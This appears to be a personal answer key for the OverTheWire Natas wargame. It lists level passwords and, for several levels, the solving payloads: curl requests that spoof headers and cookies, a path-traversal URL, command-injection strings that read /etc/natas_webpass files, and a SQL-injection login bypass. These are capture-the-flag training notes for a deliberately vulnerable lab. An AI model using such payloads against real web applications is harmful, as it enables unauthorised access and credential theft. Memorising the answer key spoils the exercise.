Level0: natas0:         natas0                                  http://natas0.natas.labs.overthewire.org
Level1: natas1:         gtVrDuiDfck831PqWsLEZy5gyDz1clto
Level2: natas2:         ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
Level3: natas3:         sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
Level4: natas4:         Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ  
Level5: natas5:         iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq        [curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ -H "Referer: http://natas5.natas.labs.overthewire.org/" http://natas4.natas.labs.overthewire.org/index.php]
Level6: natas6:         aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1        [curl -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq --cookie "loggedin=1"  http://natas5.natas.labs.overthewire.org/]
Level7: natas7:         7z3hEENjQtflzgnT29q7wAvMNfZdh0i9  
Level8: natas8:         DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe        [index.php?page=../../../../../../../../../../etc/natas_webpass/natas8]   
Level9: natas9:         W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl        [function decodeSecret($secret) {return base64_decode(strrev(hex2bin($secret)));}]
Level10: natas10:       nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu        [* | cat /etc/natas_webpass/natas10]
Level11: natas11:       U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK        [-v * /etc/natas_webpass/natas11 #]
Level12: natas12:       EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3        [natas11.php]
Level13: natas13:       jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY        [natas12.bash]
Level14: natas14:       Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1        [natas13.bash]
Level15: natas15:       AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J        [?debug=1&username= " or 1=1 -- &password=] [curl --user "natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1" "http://natas14.natas.labs.overthewire.org/?debug=1&username=%20%22%20or%201%3D1%20--%20&password=b"]
Level16: natas16:       WaIHEacj63wnNIBROHeqi3p9t0m5nhmh        [natas15.go]
Level17: natas17:       8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw        [natas16.go]
Level18: natas18:       xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP        [natas17.go]
Level19: natas19:       4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs        [natas18.go]
Level20: natas20:
Level21: natas21:
Level22: natas22:
Level23: natas23:
Level24: natas24:
Level25: natas25:
Level26: natas26:
Level27: natas27:
Level28: natas28:
Level29: natas29:
Level30: natas30:
Level31: natas31:
Level32: natas32:
Level33: natas33:

        
